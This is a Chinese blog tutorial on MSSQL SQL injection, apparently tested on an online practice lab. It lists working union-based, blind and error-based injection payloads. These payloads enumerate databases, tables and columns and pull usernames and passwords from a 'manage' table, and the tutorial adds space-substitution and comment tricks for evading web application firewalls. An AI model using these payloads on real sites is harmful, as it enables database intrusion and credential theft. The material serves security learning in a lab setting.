mssql注入与绕过

0x00前言上篇文章写了mssql的查询方式与mssql和mysql的区别。在注入当中也是有些区别的。下面直接来看到几种mssql注入的方法与特性,绕过方式。因为mssql加aspx的站懒得搭建

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

0x00   前言

上篇文章写了mssql的查询方式与mssql 和mysql的区别。在注入当中也是有些区别的。下面直接来看到几种mssql注入的方法与特性,绕过方式。因为mssql加aspx的站懒得搭建,所以这里直接拿墨者的在线靶机做测试。

0x01    mssql 联合查询

 

这里输入单引号报错了 ,初步判断存在注入。

and 1=1  正常
and 1=2  报错

这里再来猜字段

order by 10  报错
order by 5   报错
order by 4   正常

那么他的字段就是4位。

知道字段后我们再来对他进行联合查询。

and 1=2 union select null,null,null,null  报错

这里要采用null的方式来占位,因为mssql数据库是个强类型的数据库,对数据格式比较严格。

这里报错了 ,可能是union select 函数被禁用了

 

and 1=2 union all select null,null,null,null

mssql注入与绕过

 

 

 没报错但是没回显数据

and 1=2 union all select 'null,null,null,null
and 1=2 union all select null,'null',null,null
and 1=2 union all select null,null,'null',null
and 1=2 union all select null,null,null,'null'

mssql注入与绕过

 

 

 

一个一个加单引号括起来,查看类型

在第二和第三位置是可以回显数据的,我们就在 二和三的位置来查询数据

 and 1=2 union all select null,@@version,'null',null

 

mssql注入与绕过

 

 

查询版本为2005的版本, 能正常查询,这时候就可以去爆我们的数据。

先来查询他的数据库名

and 1=2 union all select null,db_name(),'null',null  查看当前数据库
and 1=2 union all select null,db_name(1),'null',null 查看第一个数据库
and 1=2 union all select null,db_name(2),'null',null 查看第二个数据库
and 1=2 union all select null,db_name(3),'null',null 查看第三个数据库
and 1=2 union all select null,db_name(4),'null',null  查看第四个数据库
and 1=2 union all select null,db_name(5),'null',null 查看第五个数据库
and 1=2 union all select null,db_name(6),'null',null 查询失败

那么这里,就可以去爆出他的数据库这里的数据库是5个数据库 

mssql注入与绕过

 

 

 这也是个mysql不一样的地方,可以直接输入db_name ()里面添加参数,直接遍历数据库名。

直接查询mozhe_db_v2这个数据库的表名

 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u'),'null',null

mssql注入与绕过

 

 

 

top是取值 ,查询到的第一行数据,那么如果我们想爆第二表呢,在mssql里面没有 limit这个函数。 

xtpye =’u’ 这个是我们指定查询的条件,查询他自定义的表

-2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u' and name <>('manage')),null,null

mssql注入与绕过

 

 

 

这里直接指定查询条件为name 不等于manage 然后爆出他的第二张表  如果后面还需要查询的话也是同样的方式。

union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u' and name <>('manage') and name<>('announcement')),null,null

这里查询不回显,那么说明他这就2张表。

既然我们现在知道了表后就可以直接来爆字段了

union all select null,(select top 1 col_name(object_id('manage'),1)from sysobjects),null,null
union all select null,(select top 1 col_name(object_id('manage'),2)from sysobjects),null,null
union all select null,(select top 1 col_name(object_id('manage'),3)from sysobjects),null,null

分别显示了 id ,username ,password 。

column_id列的标识号。 column_id 自变量具有一个 int 数据类型 。

该函数会返回指定对象的ID值,可以在sysobjects表中进行验证。

 

 

union all select null,(select top 1 username from manage),null,null
union all select null,(select top 1 password from manage),null,null

 

 

 

 

 

mssql注入与绕过

 直接爆出数据。这个是我们的简单联合的注入方式。

 

0x02    mssql 盲注

这里来直接给出语句和我们的mysql差不多,

猜表

AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A'

用取值函数来取information_schema.table 里面的值,这个数据库在我们mssql中是个视图,而不是真正的数据库。

 

AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns = 'A'

 

 

0x03   mssql 报错注入

在mssql注入里面,我们常常会利用报错注入来爆出数据,这个报错注入基本基于类型转换上的错误进行报错注入。

注入语句:

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)

如果想查询第二张表的话可以利用到前面的方式 name不等于 第一张表

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))

这里和前面说到的差不多,这个的意思是查询第一条数据 然后不在第一张表里面查询,那么就可以爆出我们的第二张表。想爆第三张表也是一样。

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))

不在前面2张表进行查询。 那么查询第一行数据就是第三表的数据。

0x04   mssql 特性

可替代空格字符的字符:

01    Start of Heading
02    Start of Text
03    End of Text
04    End of Transmission
05    Enquiry
06    Acknowledge
07    Bell
08    Backspace
09    Horizontal Tab
0A    New Line
0B    Vertical Tab
0C    New Page
0D    Carriage Return
0E    Shift Out
0F    Shift In
10    Data Link Escape
11    Device Control 1
12    Device Control 2
13    Device Control 3
14    Device Control 4
15    Negative Acknowledge
16    Synchronous Idle
17    End of Transmission Block
18    Cancel
19    End of Medium
1A    Substitute
1B    Escape
1C    File Separator
1D    Group Separator
1E    Record Separator
1F    Unit Separator
20    Space
25    %

and 和or 后的中间替代字符

01-20    范围
21    !
2B    +
2D    --
2E    。
5C    \
7E    〜

 

mssql 注释方式:

/**/    c语言注释

—    sql注释

;%00    

在绕waf当中会频繁用到这些注释方式,也会用到各种特殊字符来绕过waf,mssql可替代空格的字符比mysql多出不少,在外面绕过waf当中会有很大的帮助。

 

 

0x03   结尾

本次文章耗时 2小时。记录快乐时刻。

mssql注入与绕过

 

 

mssql注入与绕过

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119971.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • python编程100例_python进阶书籍的推荐

    python编程100例_python进阶书籍的推荐异常模块下面介绍python常用的异常模块AttributeError异常AttributeError试图访问一个类中不存在的成员(包括:成员变量、属性和成员方法)而引发的异常Attribut

  • 0xc000007b报错(win10 0xc000007b蓝屏)

    最后更新:2019-3-23请大家首先确定已经按照原文的方法及步骤尝试过,但是还是没有解决问题再来看这篇文章。如果你还没有看过原文,请先看原文:http://blog.csdn.net/VBcom/article/details/6070705看到这里的朋友,应该是看了原文但是没有解决问题。其实这个问题基本上就是由DirectX引起,但是…

  • 我为什么放弃Go语言

    我为什么放弃Go语言我为什么放弃Go语言?有好几次,当我想起来的时候,总是会问自己:这个决定是正确的吗?是明智和理性的吗?其实我一直在认真思考这个问题。开门见山地说,我当初放弃Go语言,就是因为两个“不爽”:第一,对Go语言本身不爽;第二,对Go语言社区里的某些人不爽。毫无疑问,这是非常主观的结论,但是我有足够详实的客观的论据。

  • pvp还是pve_阿特拉斯PVP好玩还是pve

    pvp还是pve_阿特拉斯PVP好玩还是pve今天组内同事分享了PVE和PVP这两种游戏中常见的战斗模式,引起了我对这两种模式的兴趣。结合分享的内容以及网络上的资料,现在来谈谈这两种战斗模式的区别。首先我们来看看他们的定义:PVE:PlayerVSEnvironment,指的是玩家与系统之间的互动。通过字面意思其实很容易理解,PVE指的是玩家挑战系统程序所控制的NPC怪物和boss,从而…

    2022年10月23日
  • 来谈谈SQL数据库中”简单的”SELECT TOP—可能有你从未注意到的细节

    来谈谈SQL数据库中”简单的”SELECT TOP—可能有你从未注意到的细节首先从博客园的JeromeWong网友说起他提出了一个这样的问题本人写了好几年SQL语句了,从来没注意到这件事情。例如:数据表如下:IDEMPNONAMEAGE126929Jerome

  • vs中文乱码怎么解决_visual studio code中文乱码

    vs中文乱码怎么解决_visual studio code中文乱码在Windows下使用VSCode编译运行,都出现中文乱码的问题,今天我就遇见了这种情况,上网搜了半天也没有找到正确的解决方法,现将我把我的方法晒一下.中文的windows下的cmd默认使用GBK的编码,每次需要的时候只要在VSCode终端输入命令:chcp65001,切换代码页到使用UTF-8就可以解决中文代码的问题,只不过这种方法太麻烦了,每次进入终端都要输入命令,那有没有永久性解决…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号